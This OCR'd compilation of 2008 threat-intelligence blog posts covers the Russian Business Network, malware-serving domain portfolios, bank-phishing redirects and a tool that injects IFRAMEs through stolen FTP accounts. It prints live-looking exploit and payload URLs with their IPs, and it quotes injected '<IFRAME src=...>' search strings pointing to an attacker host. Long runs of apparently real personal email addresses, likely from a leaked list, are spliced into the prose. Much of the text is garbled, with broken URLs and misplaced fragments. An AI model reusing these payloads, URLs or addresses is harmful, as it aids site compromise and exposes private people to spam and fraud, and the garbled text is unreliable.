10.02.2008 11:25:14 wetll | Trojan Horse, Trojan-Spy.Bankject, Infostealer.. 

09,02.2008 04:56:36 all Trojan.DL. Small. VIC, Trojan-Downloader. Win32, Wintep. aj, Downloader, Generic. 
08.02.2008 17:47:25 atl | Trojan-Spy.Bankject, Infostealer, not-a-virus:AdW are. Win32.BHO.fh 

08.02.2008 03:30:41 well Trojan. IncPack.Gen!Pac, Trojan-Spy. Win32.Broker.|, Spy-Agent.d.gen.. 


Despite that it’s already been a [1]couple of months since [2]RBN’s main ASN got "withdrawn" 
from [3]the Internet due the [4]public pressure put on the [5]Russian Business Network’s mali- 
cious [6]activities, hundreds of [7]malware variants continue trying to access their C &Cs and 
update locations from [8]RBN’s old netblock. Malware puppets with no master to connect to 
despite their endless efforts - now these are the real zombies if we’re to stick to the terminology. 
Catch up with more details on [9]RBNs migration, and extended partnership network. 


http: //ddanchev. blogspot .com/2007/11/go-to-sleep- go-to-sleep-my-little-rbn.htm 


http: //blog.washingtonpost .com/securityfix/2007/11/russian_business_network_down.htm 
http: //ddanchev. blogspot .com/2007/11/detecting-and-blocking-russian-business.htm 


http: //ddanchev. blogspot .com/2007/11/exposing-russian-business-network.htm 


. http: //ddanchev. blogspot .com/2007/10/russian-business-network.htm 


. http: //ddanchev. blogspot .com/2008/01/rbns- fake-account- suspended-notices. htm 


http: //ddanchev. blogspot .com/2007/10/over-100-malwares-hosted-on-single-rbn. htm 


. http: //ddanchev. blogspot .com/2007/10/rbns-fake-security-software.htm 


. http: //ddanchev. blogspot .com/2008/02/geolocating-malicious-isps.htm 
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4.2.20 Yet Another Massive Embedded Malware Attack (2008-02-27 19:17) 


Warn ns.com 


coripastares.com 


xanjan.cn xanjan.cn 
chportal.cn 


coripastares.com buhaterafe.com 


The following central redirection point in a portfolio of exploits and malware serving domains 
- buytraffic.cn/in.cgi?11 is currently embedded at couple of hundred sites and forums across 
the web. And just like the many previous such examples, the process is automated to the 
very last stage. Repeated requests expose the entire domains portfolio, where once the live 
exploit is served with the help of a javascript obfuscations, the binaries come into play. Here 
are all the domains and live exploit URLs involved for this particular campaign : 


buytraffic.cn/in.cgi?11 - 62.149.18.34 

sclgntfy.com/ent2763.htm - 85.255.118.12 
tds-service.net/in.cgi?20 - 72.233.50.148 
spywareisolator.com/landing/?wmid=sga - 72.233.50.150 
warinmyarms.com/check/upd.php?t=670 - 58.65.239.114 
coripastares.com/in.php?adv=1267 &val=3ee328 - 202.83.197.239 
xanjan.cn/in.cgi?mikh - 78.109.22.246 
chportal.cn/top/count.php?0=4 - 203.117.111.102 
buhaterafe.com/in.php?adv=1208 &val=65286d - 202.83.197.239 
193.109.163.179/exp/count.php 

193.109.163.179/exp/getexe.php 

78.109.22.242/mikh/1.html 

78.109.22.242/sh.html 


Who says there’s no such thing as free malware cocktails. 


Related posts : 

[1]MDAC ActiveX Code Execution Exploit Still in the Wild 
[2]Malware Serving Exploits Embedded Sites as Usual 
[3]Massive RealPlayer Exploit Embedded Attack 
[4]Syrian Embassy in London Serving Malware 
[5]Bank of India Serving Malware 

[6]U.S Consulate St. Petersburg Serving Malware 
[7]The Dutch Embassy in Moscow Serving Malware 
[8]U.K’s FETA Serving Malware 
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[16]| See Alive IFRAMEs Everywhere - Part Two 
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As we’re on the topic of [1]RBN’s zombies trying to connect to their old netblocks, and 
[2]botnets being used to host and send out phishing content, what looks like entirely isolated 
incidents in the present, is what has actually being going on on RBN’s network during the 
summer of 2007. A picture is worth a thousand speculations, yes it is. As you can see in the 
attached historical screenshot of a web based botnet C &C, the Russian Business Network’s 
old infrastructure has also been involved into delivering phishing pages to malware infected 
hosts, whose requests to the legitimate sites were getting forwarded to RBN’s old netblock. 
The process is too simple, thereby lowering the entry barriers into phishing activities due to its 
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modularity. Basically, the botnet master can easily configure to which fake phishing site the 
infected population would be redirected to, if they are to visit the original one with no more 
than three clicks. And so, for the purpose of historical preservation of [3]CYBERINT data given 
the quality of the identical screenshot obtained through [4]JOSINT techniques - 


RBN URLs used in the phishing redirects : 
81.95.149.226/scm/us/wels/index.html 
81.95.149,226/scm/uk/lloydstsb/personal/index.html 
81.95.149.226/scm/cyprus/persmain.html 
81.95.149.226/scm/au/westpac/index.html 
81.95.149,226/scm/au/commonwealth/ 
81.95.149,.226/scm/au/warwickcreditunion/index.html 
81.95.149.226/scm/uk/lloydstsb/business/index.html 
81.95.149.226/scm/uk/halifax.php 
81.95.149,226/scm/uk/rbsdigital/index.html 
81.95.149,226/scm/uk/co-operative/index.html 
81.95.149,.226/scm/uk/cahoot.php 


Known malware to have been connecting to 81.95.149.226 : 

Trojan-PSW.Win32.LdPinch.bno, Trojan-Downloader.Win32.Small.emg, Trojan.Nuklus, where 
the malware detected under different names by multiple vendors is the only one that ever 
made a request to 81.95.149.226, which in a combination with the fact that the screenshot is 
made out of Nuklus production speaks for itself. 


Some facts are better known later, than never. 


1. http: //ddanchev. blogspot .com/2008/02/rbns-malware-puppets-—need-their-master .htm 


2. http: //ddanchev. blogspot .com/2008/02/inside-botnets-phishing-activities.htm 


3. http://ddanchev. blogspot .com/2006/09/cyber-intelligence-cyberint .htm 
4. http://ddanchev. blogspot . com/2006/09/benef its- of-open-source-intelligence. htm 
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4.3 March 


4.3.1 Embedding Malicious IFRAMEs Through Stolen FTP Accounts (2008-03-03 17:21) 


Keywords for gaining attention from a marketing perspective [1]for last week - [2]embedded 
malware, [3]IFRAMEs, [4]stolen FTP accounts, [5]Fortune 500 companies, Russia. Nothing’s 
wrong with that unless of course you’re interested in the whole story and the big picture, which 
wouldn’t be excluding the possibility for having a Fortune 500 company’s servers acting as C 
&Cs for a large botnet. Why are Fortune 500 servers excluded as impossible to get hacked at 
the first place, making it look like that the amount of money spent on security is proportional 
with the level of security reached? [6]The more you spend does not mean the more secure it 
gets if you’re [7]not allocating the money where they have to be allocated at, in a particular 
moment of time, given the [8]dynamic threatscape these days. 
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audrey.rallieres@free.fr 
audrey.zani@longandfoster.com 
Audrey@ucanbuyahome.com 
Audrey 45wo@yahoo.com 
audrey09davila@hotmail.com 
audreycora0@hotmail.com 
audreygreen@aol.com 
audrius n@mail.ru 
augustanrea@earthlink.net 
augusto.iori@augaug. it 
augustoepaola@virgilio.it 
auhopudm@mail.ru 
auletta.g@tiscali.it 
Aum@cox.net 
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aumarmundra@gmail.com 
auntiebrenhh@aol.com 
aupxxphantomxx@live.com 
aurelie.jerome.71@free.fr 
aurelya_bruneta@yahoo.com 
aurynl1026@gmail.com 
ausei@yahoo.com 
ausragirdziene@mail.ru 
aussiemcaleer@hotmail.com 
austin8197@gmail.com 
austindias3l1l@yahoo.com 
austinre@bellsouth.net 
austinwest0@gmail.com 

austria _azores@hotmail.com 
autoricambi.muccitelli@virgilio.it 
autumnthgm@yahoo.com 
AutymnBrown@yahoo.com 
avafiadis@prudentialgammonsrealty.com 
avalue@cox-internet.com 
avamgordon@yahoo.com 
avandehei-realtor@sbcglobal.net 
avansil@virgilio. it 
avas5@aol.com 
avelinahek@yandex.com 
avellaneda.raphael@aliceadsl.fr 
averageghu@gmail.com 
averie.seeley@yahoo.com 
avi.chalid@gmail.com 
avidrealtor@gmail.com 
Avilaproperties@gmail.com 
avinash.only123@gmail.com 
avinberg@gmail.com 
aviva.goren@gmail.com 
avocado1990@gmail.com 


avre4u@gmail.com 
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avrealtorl1@aol.com 
avreoteam@yahoo.com 
avril.douglas@longandfoster.com 
avtoholl@mail.ru 
avv.bombardi@tiscali.it 
avv.carminegrisolia@tiscali.it 
avv.elisavaccari@virgilio.it 
avv.federicaolivieri@tiscali.it 
avv.mangialavori@virgilio.it 
avv.piermancuso@virgilio. it 
aw52095@aol.com 
awaizdowdig@hotmail.com 
awarner444@yahoo.com 
awbeaton@yahoo.com 
aweinshank@aol.com 
awhatcott@hotmail.com 
awiki29@hotmail.es 
awilli6793@aol.com 
awisec@aol.com 
awiseman40@aol.com 
awleissa@mindspring.com 
aworsham@cbunited.com 
awprice@gmail.com 
awriterslife@hotmail.com 
awsarc@yahoo.com 
ax1988@virgilio.it 
axel.mary@tiscali.it 
axeljlundberg@gmail.com 
axeljohnlL0000@gmail.com 
axelschorcht@web.de 
axenlov@hotmail.com 
axhdhciw@mail.ru 
axisernia@hotmail.com 
axlrose982@virgilio.it 
ay.addfgelp@hotmail.com 
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ayaeze@sarealtyagency.com 
ayalasr2@yahoo.com 
ayano0906@gmail.com 
aydinpfxq@hotmail.com 
aydinyigit @hotmail.com 
ayesha@accessappraiser.net 
ayesha70@bellsouth.net 
ayizemaat@aol.com 
aylamete@windovslive.com 
aylamete@windowslive.com 
aymansafwat88@yahoo.com 
ayperi@graffiti.net 
ayramoore27@aol.com 
ayveillet@free.fr 
azaldivar@kw.com 

azamat _frolov@mail.ru 
azartas@mail.ru 

azat iusupov@mail.ru 
azaxpunk@tiscali.it 
azbfc54@tiscali.it 
Azbuyhomes@cox.net 
azcerix@gmail.com 
azdbackfan@excite.com 
azencenco@gmail.com 
azfirefox@gmail.com 
azforsale@cox.net 
azgoasdmf@mail.ru 
azhomes1@aol.com 
AzHomesByShelly@gmail.com 
azim.nassimi@gmail.com 
azimbakeev@gmail.com 
azimmerman3@comcast.net 
azka.secio@yahoo.co.id 
azman2002@gmail.com 


azmera.alemayehu@coldwellbanker.com 
13181 


azonta@gmail.com 
azpeggyaz@aol.com 
azrealtyvaluations@gmail.com 
AZREChris@msn.com 
azreoagents@yahoo.com 
AZREObroker@gmail.com 
AZREOSpecialist@cox.net 
azreoteam@cox.net 
azrequeen@mac.com 
b.baker@lagunaproperties.org 
b.curreli@tiscali.it 
b.i.0.sS@mail.ru 
b.londynka@poczta.fm 
b.lorenz87@freenet.de 
b.losi@virgilio.it 
b.mederowicz@wp.pl 
b.mitchell@umiami.edu 
b_a_jewel4@yahoo.com 
b baker89@yahoo.com 
b _litzinger321@yahoo.com 
b _luck@hotmail.com 

b schanz48@yahoo.com 
bObrik11@mail.ru 
b19monday@yahoo.com 
bischwrtz@aol.com 
b4ny@aol.com 
baambu8@aol.com 
baantacron@gmail.com 
baba.rossi@tiscali.it 
babaanntee@yahoo.com 
babaiev-artiem@mail.ru 
Babbabrian@hotmail.com 
babedocl@aol.com 
babegglen@tiscali.it 
babegurl513@aol.com 
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What’s most important to point out about the recent incident of Fortune 500 companies stolen 
FTP accounts, is that it’s "stolen accounting data for sale" as usual, as usual in the sense of the 
hundreds of other such propositions currently active online. And if we’re to use an analogy on 
its importance as a event, it’s like your smell receptors, namely the more you use a particular 
fragnance, the less you’re capable of sensing it since you’re getting used to the smell. In this 
line of thoughts, what’s "stolen accounting data for sale as usual" for some, is exclusive event 
for others. Even worse, it’s "slicing the threat on pieces" compared to discussing the "pie" itself. 
Moreover, the [9]shift from products to services in the underground marketplace is something 
[10]that’s been happening for the past three years, and therefore making it sound like it’s been 
happening as of yesterday, brings the discussion to the lowest possible level - right from the 
very beginning. Try the following malicious services on demand for instance, demostranting 
key business concepts such as consolidation, vertical integration, benchmarking -Q &A, and 
standartization : 
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babele2@tiscali.it 
baberraja@hotmail.com 
babinappraisals@cox.net 
babsina@tiscali.it 
babu.pasupathy@gmail.com 
Babybeegurl@hotmail.com 
babygirll382@aol.com 
babygirljac@gmail.com 
babyjason123@t-online.de 
babyrico69@gmail.com 
bachmann.peter@gmail.com 
bachms@tiscali.it 
bachtran237@yahoo.com 
backcomchere1953@mail.ru 
backerk90@gmail.com 

bad _. boy@tiscali.it 


bad _ass_696912001@yahoo.com 


badboy1974@virgilio. it 
badfish456@yahoo.com 
badfishxx@gmail.com 
badmaleiam@yahoo.com 
bados __06@hotmail.com 
bafajule@free.fr 
BaffourA@gmail.com 
bagbyd@comcast.net 
baggioeric@orange.fr 
bagira3074@mail.ru 
bagroup@comcast.net 
bah.marwane@gmail.com 
bahca@tiscali.it 
bahon.dominique@free.fr 
baileyappraisal@hughes.net 
baileyappraisals@comcast.net 
baileyhometeam@mlode.com 


bairnair@aol.com 
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baivu.ak@gmail.com 
baja@casofsc.com 
bakersoldit@yahoo.com 
bakiro@comcast.net 
balaucoelho@gmail.com 
balbry@wfrmls.com 
baldia@wfrmls.com 
baliel@vp.pl 
balikta@balikta.com 
balima@ucdavis.edu 
ballbus@sbcglobal.net 
balsitis@grar.com 
baltijos2004@yandex.ru 
baltimoremich@yahoo.com 
baltru@mail.ru 
balumi@tiscali.it 
balzamapietro@virgilio. it 
Balzap@aol.com 
bam61190@freenet.de 
bamaguy852@yahoo.com 
bamaoleary@gmail.com 
bambamcauan@hotmail.com 
bamoorejohnson@gmail.com 
bampaisley@comcast.net 
bamperis@mail.ru 
Banamu@mail.ru 
bandascalea@virgilio.it 
banderton81@hotmail.com 
bandicoot56@gmail.com 
bandreason@hotmail.com 
bankerre@nyc.rr.com 
bankownedrealtor@gmail.com 
bankreo@empirerealtyfl.com 
bankreoagent@genaro4homes.com 


bansan83@yahoo.com 
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baobabdicorsentinig@tiscali.it 
bapfel@gmail.com 
baportnoy@comcast.net 
bappldc@aol.com 
bapt.prince@orange.fr 
barabbamr@tiscali.it 
baracuda_ 999@mail.ru 
barahonahomes@yahoo.com 


barajas4u@aol.com 


baran.atakan.akhan@hotmail.com 


baranjc@fastmail.fm 
barattocopi@tiscali.it 
barb@bk-realty.com 


barbara.buerke@gmail.com 


barbara.collins@prucarolinas.com 


barbara.comstock@sbcglobal.net 


barbara.fagnani@tiscali.it 


barbara.french@coldwellbanker.com 


barbara.pistolesi@virgilio.it 
barbara@allstarlocating.com 
barbara@barbaracampbell.com 
Barbara@soldbyBarbara.com 
barbara _diego@tiscali.it 
barbara _solano@tiscali.it 
barbaragallera@tiscali.it 
barbarahuck@yahoo.com 
barbarahunt@yahoo.com 
BarbaraKelly4you@yahoo.com 
barbaraori@virgilio.it 
barbarap72@virgilio.it 
barbararakestraw@hotmail.com 
barbaratavassi@tiscali.it 
barbarola@fastwebnet. it 
barbaroth@yahoo.com 


barbierdelaunay@free.fr 
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barbjeddi@yahoo.com 
barblapilusa@comcast.net 
barbn6é2@yahoo.com 
barbshew@yahoo.com 
barci.eng@tiscali.it 
barclayfth@hotmail.com 
barcosta73@virgilio.it 
barditisca@tiscali.it 
baretsky@gmail.com 
bariccal1953@tiscali.it 
barme@tiscali.it 
barnesab50586@yahoo.com 
Barnesr0O7@gmail.com 
barnett.cory@gmail.com 
Barnettsx4@aol.com 
barneyst@charter.net 
baronchefhat@gmail.com 
barra.davide@tiscali.it 
barrakxayana@yahoo.com 
barrettappraisal@inet-email.com 
barrieshoblock@gmail.com 
barrowrhcx@hotmail.com 
barry.crossland@me.com 
barry.hopton@gmail.com 
barry@azbennett.com 
barry@barrymangan.com 
barry@mountainvestments.com 
barry@myALappraiser.com 
barry@rihomesearch.com 
Barryagold@aol.com 
barryewiley@aol.com 
barryhilll23@yahoo.com 
barrylamonds@comcast.net 
barrymarr@verizon.net 
barryob90@hotmail.com 
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barrysanders@bellsouth.net 
barrytanner@edinarealty.com 
barryvan@earthlink.net 
barrywgardner@gmail.com 
barrywilliams@san.rr.com 
bartekkk812@wp.pl 
bart-ff@mail.ru 
bartigliere@yahoo.com 
bartoj@tiscali.it 
bartosz.kleibor@interia.pl 
bartthecartoon@aol.com 
baruchr719@yahoo.com 
bas.stephane@laposte.net 
basantmaya@gmail.com 
baseballcraze101@hotmail.com 
basedvans@gmail.com 
baseldaradkah@hotmail.com 
basem _h@live.com 
bashel@comcast.net 
bashfulinny11419@yahoo.com 
bashirov-vanyusha@mail.ru 
basia090884@wp.pl 
basileri@tiscali.it 
basileuS1981@googlemail.com 
basilio@gutierrezhomes.com 
basilsingh@gmail.com 

basket _ball1116@yahoo.com 
BASLLC@verizon.net 
bassheadjazz@yahoo.com 
basso82.mario@tiscali.it 
bastecco@virgilio.it 
basteldoktor@gmx.de 
bastyortiz@hotmail.com 
batas@mail.ru 


batesjrn@aol.com 
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bateson.d@neu.edu 
batesrealestate@yahoo.com 
batle4s@hotmail.com 
battdm@sbcglobal.net 
batters@tiscali.it 
battiniellopasquale@virgilio.it 
battlekevins@gmail.com 
battleram19@yahoo.com 
batu-d@t-online.de 
batzan@tiscali.it 
bauermt@web.de 
baumanmhng@hotmail.com 
bauro90@tiscali.it 
bavery13@tampabay.rr.com 
bawalkulot@yahoo.com 
baxterappraisal@gmail.com 
baylstrealty@gmail.com 
BayareaBPO@yahoo.com 
baybonita28@aol.com 
bayleafrealty@gmail.com 
baylenefinn@don.com 
bayridgeappraisal@charter.net 
baysidere@nyc.rr.com 
baysiderealestate@hotmail.com 
baz94@tiscali.it 
bazoch@hotmail.com 

bb _danuzz@yahoo.com 
bb1294@showcoachfactory.com 
bb1312@showcoachfactory.com 
bb1404@showcoachfactory.com 
bbager@mail.bg 
bbannister@cbnorcal.com 
bbappraisalservices@gmail.com 
bbartolini@virgilio.it 
bbb1@showcoachfactory.com 
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bbb1lO@showcoachfactory.com 
bbb1003@showcoachfactory.com 
bbb1012@showcoachfactory.com 
bbb1023@showcoachfactory.com 
bbb1025@showcoachfactory.com 
bbb103@showcoachfactory.com 
bbb1031@showcoachfactory.com 
bbb1032@showcoachfactory.com 
bbb1040@showcoachfactory.com 
bbb1041@showcoachfactory.com 
bbb1049@showcoachfactory.com 
bbb1051@showcoachfactory.com 
bbb1054@showcoachfactory.com 
bbb1055@showcoachfactory.com 
bbb1057@showcoachfactory.com 
bbb1060@showcoachfactory.com 
bbb1061@showcoachfactory.com 
bbb1062@showcoachfactory.com 
bbb107@showcoachfactory.com 
bbb1071@showcoachfactory.com 
bbb1072@showcoachfactory.com 
bbb108@showcoachfactory.com 
bbb1089@showcoachfactory.com 
bbb1092@showcoachfactory.com 
bbb1098@showcoachfactory.com 
bbb11@showcoachfactory.com 
bbb110@showcoachfactory.com 
bbb1101@showcoachfactory.com 
bbb1103@showcoachfactory.com 
bbb1106@showcoachfactory.com 
bbb1110@showcoachfactory.com 
bbb1113@showcoachfactory.com 
bbb1114@showcoachfactory.com 
bbb1120@showcoachfactory.com 
bbb1122@showcoachfactory.com 
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bbb1140@showcoachfactory.com 
bbb1148@showcoachfactory.com 
bbb1150@showcoachfactory.com 
bbb1151@showcoachfactory.com 
bbb1153@showcoachfactory.com 
bbb1154@showcoachfactory.com 
bbb1155@showcoachfactory.com 
bbb1157@showcoachfactory.com 
bbb1158@showcoachfactory.com 
bbb1160@showcoachfactory.com 
bbb1161@showcoachfactory.com 
bbb1162@showcoachfactory.com 
bbb1167@showcoachfactory.com 
bbb1169@showcoachfactory.com 
bbb1170@showcoachfactory.com 
bbb1172@showcoachfactory.com 
bbb1175@showcoachfactory.com 
bbb1176@showcoachfactory.com 
bbb1177@showcoachfactory.com 
bbb1178@showcoachfactory.com 
bbb1179@showcoachfactory.com 
bbb1180@showcoachfactory.com 
bbb1181@showcoachfactory.com 
bbb1190@showcoachfactory.com 
bbb1192@showcoachfactory.com 
bbb1204@showcoachfactory.com 
bbb1207@showcoachfactory.com 
bbb1208@showcoachfactory.com 
bbb1210@showcoachfactory.com 
bbb1211@showcoachfactory.com 
bbb1213@showcoachfactory.com 
bbb1214@showcoachfactory.com 
bbb1215@showcoachfactory.com 
bbb1219@showcoachfactory.com 
bbb1222@showcoachfactory.com 
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bbb1224@showcoachfactory.com 
bbb1225@showcoachfactory.com 
bbb1226@showcoachfactory.com 
bbb1234@showcoachfactory.com 
bbb1239@showcoachfactory.com 
bbb1240@showcoachfactory.com 
bbb1241@showcoachfactory.com 
bbb1243@showcoachfactory.com 
bbb1246@showcoachfactory.com 
bbb1249@showcoachfactory.com 
bbb1252@showcoachfactory.com 
bbb1254@showcoachfactory.com 
bbb1258@showcoachfactory.com 
bbb1259@showcoachfactory.com 
bbb1262@showcoachfactory.com 
bbb1264@showcoachfactory.com 
bbb1266@showcoachfactory.com 
bbb1270@showcoachfactory.com 
bbb1274@showcoachfactory.com 
bbb1275@showcoachfactory.com 
bbb1276@showcoachfactory.com 
bbb1284@showcoachfactory.com 
bbb1286@showcoachfactory.com 
bbb1296@showcoachfactory.com 
bbb1299@showcoachfactory.com 
bbb1300@showcoachfactory.com 
bbb1301@showcoachfactory.com 
bbb1302@showcoachfactory.com 
bbb1303@showcoachfactory.com 
bbb1304@showcoachfactory.com 
bbb1305@showcoachfactory.com 
bbb1306@showcoachfactory.com 
bbb1307@showcoachfactory.com 
bbb1308@showcoachfactory.com 
bbb1310@showcoachfactory.com 
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bbb1313@showcoachfactory.com 
bbb1314@showcoachfactory.com 
bbb1332@showcoachfactory.com 
bbb1333@showcoachfactory.com 
bbb1334@showcoachfactory.com 
bbb1335@showcoachfactory.com 
bbb1336@showcoachfactory.com 
bbb1337@showcoachfactory.com 
bbb1338@showcoachfactory.com 
bbb1339@showcoachfactory.com 
bbb1340@showcoachfactory.com 
bbb1341@showcoachfactory.com 
bbb1345@showcoachfactory.com 
bbb1346@showcoachfactory.com 
bbb1350@showcoachfactory.com 
bbb1351@showcoachfactory.com 
bbb1352@showcoachfactory.com 
bbb1355@showcoachfactory.com 
bbb1356@showcoachfactory.com 
bbb1358@showcoachfactory.com 
bbb1359@showcoachfactory.com 
bbb1360@showcoachfactory.com 
bbb1361@showcoachfactory.com 
bbb1363@showcoachfactory.com 
bbb1365@showcoachfactory.com 
bbb1366@showcoachfactory.com 
bbb1367@showcoachfactory.com 
bbb1401@showcoachfactory.com 
bbb1403@showcoachfactory.com 
bbb1405@showcoachfactory.com 
bbb2@showcoachfactory.com 
bbb2021@showcoachfactory.com 
bbb4@showcoachfactory.com 
bbb5@showcoachfactory.com 
bbb7@showcoachfactory.com 
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- [11]Wild Wild Underground 

- [12]DDoS on Demand VS DDoS Extortion 

- [13]Malware as a Web Service 

- [14]Multiple Firewalls Bypassing Verification on Demand 

- [15]Managed Spamming Appliances - The Future of Spam 
- [16]Botnet on Demand Service 

- [17]DIY CAPTCHA Breaking Service 

- [18]Managed Fast-Flux Provider 

- [19]Which CAPTCHA Do You Want to Decode Today? 

- [20]Localizing Cybercrime - Cultural Diversity on Demand 
[21]On the other side of the universe : 


"The concept of Software-as-a-Service (SaaS) is nothing new, but this is the first time any- 
one has organized the purchase of FTP login credentials, with additional tools available 
to help a buyer confirm he’s making a smart purchase." 


on the other side of the universe on [22]Neosploit’s "purpose in life" : 


"The information was available for blackmarket trade, along with the NeoSploit version 2 
crimeware toolkit, a malicious application specifically designed to abuse and trade 
stolen FTP account credentials from numerous legitimate companies." 


Robert Lemos is however, [23]reasonably pointing out that : 


"The tool, which is at least a year old, was described by antivirus firm Panda Software in June 
2007." 
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bbb8@showcoachfactory.com 
bbblIc@bellsouth.net 
BBelke@aol.com 
bbi592@sbcglobal.net 
bbiafore@hotmail.com 
bbirlew@msn.com 
bbjnjjo@aol.com 
bblaskower@comcast.net 
bboland@golyon.com 
bbonsante@gmail.com 
bbopjz@aol.com 
BBowers772@aol.com 
bbrandimar@aol.com 
bbrandnew@netzero.com 
bbrandonelliott@live.com 
bbrandy2002@aol.com 
bbreeze@broadpark.no 
bbrown09@bellsouth.net 
bbsmichelle@yahoo.com 
bbuell@starkhomes.com 
bbumphrey@cox.net 
bbygrl251@Yahoo.com 
bc21@aol.com 
bcamacho42@attn.net 
bcansu33@gmail.com 
bcarter@cag-az.com 
bcashen@c21clarkprop.com 
bcazaubon@bellsouth.net 
bcec0362@aol.com 
bcentury21@gmail.com 
bcfmgmcv@mail.ru 
bchoiceins@bellsouth.net 
bchristian@purenews.com 
bchurchpeck@gmail.com 
bcl111@aol.com 
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bcolucci@tiscali.it 
bcook111@gmail.com 
bcornwell@live.co.uk 
bcsal@showcoachfactory.com 
bctukygd@mail.ru 
bcwild2003@hotmail.com 
bcyhoney@aol.com 
bd.moitinho@bol.com.br 
bdekruif@clear.lakes.com 
bdh2122@yahoo.com 
bdildine@tulsarealtors.com 
bdmicl@free.fr 
bdockery@tampabay.rr.com 
Bdoebel@aol.com 
bdrake@tulsarealtors.com 
bds _appraisals@yahoo.com 
bdskztset@mail.ru 
bdunn@cdanjoyner.com 
bdunnc21@aol.com 
bdvr1@aol.com 
bdw86@mail.ru 

be zly@yahoo.com 
bea.mamrot@remax.net 
bea9995@hotmail.com 
beachdadsofl@aol.com 
beachst@hotmail.com 
beachwood42@aol.com 
beag.uan@gmail.com 
beahleah@hotmail.com 
beanandpumpkin2@aol.com 
beandersonian@gmail.com 
beanox1@cox.net 
bearfingersl1@gmail.com 
bearstang91@gmail.com 
bearyfan5@aol.com 

13194 


beas 19 kapo@hotmail.es 
beatlemn2@yahoo.com 
beatrice.bernaudin@aliceadsl.fr 
beatricesellsnaples@yahoo.com 
Beatrix.Wagner@gmail.com 
beau _williams214@yahoo.com 
beaubagley7@gmail.com 
beaulight@gmail.com 
beaverroof@aol.com 
beba01013@yahoo.com 
bebemcq@comcast.net 
bebo-11@tiscali.it 
beccamozart@gmail.com 
becchini@gmail.com 
becerro@tiscali.it 
becjay@verizon.net 
becka@learnandgrowtogether.com 
beckieheld@yahoo.com 
beckstead@syptec.com 
becky.hottman@century21.com 
becky.preferredrealty@windstream.net 
becky.stewart@realtydirect.com 
Becky@lebonrealestateinc.com 
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Key summary points : 
- the tool’s been around since February, 2007, making it exactly one year old 


- it has built-in accounting data validation, pagerank measurement of the sites whose FTP ac- 
counting data has been stolen as you can see in the third screenshot attached 


- IP Geolocation for the now pagerank-ed sites is also included 


- the tool’s functions are relatively primitive compared to three other alternative ones that I’m 
aware of taking advantage of anything by stolen FTP accounts, a logical fad by itself 


- the script is officially sold for $25, but as we’ve seen it in the past with MPack and IcePack, 
buyers unaware of other outlets for the tool would pay the high-profit margins offered by the 
seller 


- FTP accounting data can be imported, and once verified, a statistical output for the automated 
process of logging in and embedding the IFRAME is provided 


- IFRAMEs are automatically embedded within .php; .html; .asp; .hAtm extensions 


- embedding iframes through stolen FTP accounts is a fad, purchasing and selling [24]shells/web 
backdoors and huge domain portfolios controlled via Cpanels is a trend, as automatic injection 
of malicious IFRAMEs through [25]remote file inclusion and remotely exploitable SQL injection 
vulnerabilities is 


Your situational awareness about the emerging threatspace is as always up to the information 
sources that you use, or still haven’t started using. My point is that exposing Pinch in the sum- 
mer of 2007 despite that the tool’s been around since 2004/2005, and exposing this malicious 
FTP account checker and IFRAMEs embedder in February, 2008, when it hasn’t been updated 
since February, 2007, greatly contributes to the development of a twisted situational aware- 
ness. Realizing it or not, with the time, security researchers or intelligence analysts establish 
a very good sense of intuition about what’s happening at a particular moment in time, or what 
will be happening anytime now. And using stolen FTP accounts for embedding IFRAMEs never 
picked up as a tactic, compared to using the stolen FTP accounts for hosting blackhat SEO 
content. Scenario building intelligence, or playing the devil’s advocate, it’s a mindset only a 
small crowd possess. 


. bttp://www.finjan.com/Content .aspx?id=136 
. http: //blogs.zdnet .com/security/?p=908 


ttp://www.darkreading.com/document .asp?doc_id=147123&f_src=darkreading_section_296 


ttp://zedomax .com/blog/2008/02/28/hackers-use-saas-to-auction-ftp-passwords-inject-code/ 


. http: //ddanchev.blogspot .com/2006/05/valuing-security-and-prioritizing-your .htm 
. http://ddanchev. blogspot . com/2006/07/budget-allocation-myopia-and. htm 
ttp://www.computerweekly.com/blogs/stuart_king/2008/02/risk-assessment-is-a-hazardess.htm 


. http: //ddanchev. blogspot .com/2007/03/underground-economys-supply-of-goods .htm 


1 
2 
3 
4 
5. http://blogs.ittoolbox.com/security/dmorrill/archives/malware-as-a-service-22761 
6 
7 
8 
9 


10, jeep: //adanchev blogspot .con/2007/10/dynanics-of-nalvare-industry tal 
| http://adanchev.blogepot con/2006/04/wild-wild-underground_ 25h 
_nttp://adanchev. blogspot .con/7007/05/dos- on danand-vs-ddos-extort ion. tall 
| http://ddanchey. blogepot con/2007/08/nalvare-a5-veb-service.htal 
 fieep:/ /Adanchey, blogepot .com/2007/10/annaged-pamning-appliances-furure-of tal 
_http://adanchev. blogspot .con/2007/s0/botnet~on-denand~service. nea 
_http://adanchev. blogspot .con/2007/30/ly-captcha- breaking” service. ital 
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. http://arstechnica.com/news.ars/post/20080228-malware-writers-exploring-software-as-a-service-model.htm 


22. http: //www.crn.com/security/206900656 
23. http: //www.securityfocus.com/brief/691 
24. http: //ddanchev. blogspot .com/2007/04/compilation-of-web-backdoors .htm 


. http: //ddanchev. blogspot .com/2007/07/sql-injection-through-search-engines.htm 


4.3.2 ZDNet Asia and TorrentReactor IFRAME-ed (2008-03-04 15:39) 


Search results for "photos a poil <IFRAME src=/72.232.39.262/a ... 

What's new on ZDNet Asia. Search All, News, Insight, Reviews, Glogs, TechGuides, Photo 
Gallery, Videos, Jobs, IT Library, Downloads, Go, Create alert .. 
wow. zdnetasia.com/search/results. him?query=photos+aspoils%3CIFRAME% 
2sre=/72,232.39.252/a/%3E. html - 43k - 17 hours ago - Cached - ages 


Search results for “pictures of a gorila <IFRAME src=//72.232 ... 

Search All, News, Insight, Reviews, Blogs, TechGuides, Photo Gallery, Videos, Jobs, IT 
Library, Downloads. Go. Create alert... 

www. zdnetasia, corm/search/results, htm?query=pictures +of+a+gorila+%3CIFRAME% 

2 sre=//72.232.39.252/a/%3E. html - 42k - 15 hours ago - Cached - Similar pages 


rch results for “pi f a bintrong <IFRAME src=/72.232 ... 
Featured Whitepapers. Search All, News, Insight, Reviews, Blogs, TechGuides, Photo 
Gallery, Videos, Jobs, IT Library, Downloads, Go. Create alert ... 
wow. zdnetasia. com/search/results. him? query=picture+of+a+bintrong+%3CIF RAME% 
2 sre=//72, 232,39, 252/al%3ZE., html - 42k - 15 hours ago - Cached - Similar pages 


Search results for "peek a bo bikini <IFRAME src=/72.232.39.252ia ... 
Featured Whitepapers. Search All, News, Insight, Reviews, Blogs, TechGuides, Photo 
Gallery, Videos, Jobs, IT Library, Downloads. Go. Create alert ... 

